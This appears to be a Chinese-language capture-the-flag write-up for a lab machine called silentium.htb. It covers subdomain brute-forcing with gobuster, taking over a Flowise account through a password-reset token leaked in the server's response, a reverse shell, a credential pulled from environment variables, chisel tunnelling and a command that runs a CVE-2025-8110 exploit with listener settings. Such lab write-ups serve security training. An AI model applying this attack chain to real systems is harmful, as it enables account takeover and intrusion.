type
Post
status
Published
date
May 9, 2026
slug
summary
tags
category
category (1)
icon
password
comment
先进行扫描
notion image
得到开放了80端口,那就开始进行浏览器访问,它会重定向导致域名无法解析,我们要先将重定向的域名绑定到靶机的ip
notion image
然后直接去访问
notion image
利用子域名爆破命令gobuster vhost -u "http://10.129.57.197" -w /Users/qin/Documents/渗透/Fuzz_dict/subdomains-top1million-20000.txt --append-domain --domain silentium.htb
爆破出子域名
notion image
同理,将子域名的解析加入host文件
notion image
去浏览器访问
notion image
访问源代码发现框架是Flowise
notion image
直接进行登陆发现用户找不到
notion image
看到主页领导人姓名
notion image
猜测用户是ben@silentium.htb
notion image
提示密码不对,所以应该是用户名对了,但是密码不知道,我们去试一下能不能进行重置密码的操作
notion image
可以看到重置密码需要token,这个token是发给邮箱的,我们在忘记密码的界面填入邮箱抓包看看能不能token是否是在返回包里就有的
notion image
填入用户的邮箱ben@silentium.htb 抓包
notion image
看到了临时的token,我们用这个去重置密码试试
notion image
我们用新的密码登陆
notion image
成功登陆
根据cve去反弹shell
notion image
查看env得到好多密码
notion image
用用户名ben 和密码r04D!!_R4ge 尝试ssh连接
notion image
查看到内网本地有3001端口开放
notion image
用chisel代理到本地
notion image
本地访问
notion image
注意要提前注册,将用户名和密码写入脚本然后注释脚本的注册函数的执行
notion image
python CVE-2025-8110.py -u http://127.0.0.1:3001/ -lh xxx -lp 5555
notion image
notion image
 
0xGame2024GRPO:Group Relative Policy Optimization
Loading...